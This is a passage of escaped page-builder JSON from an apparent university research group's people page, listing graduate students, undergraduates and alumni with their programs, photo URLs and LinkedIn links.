},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-1663377340901.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1657,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Raiyan\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 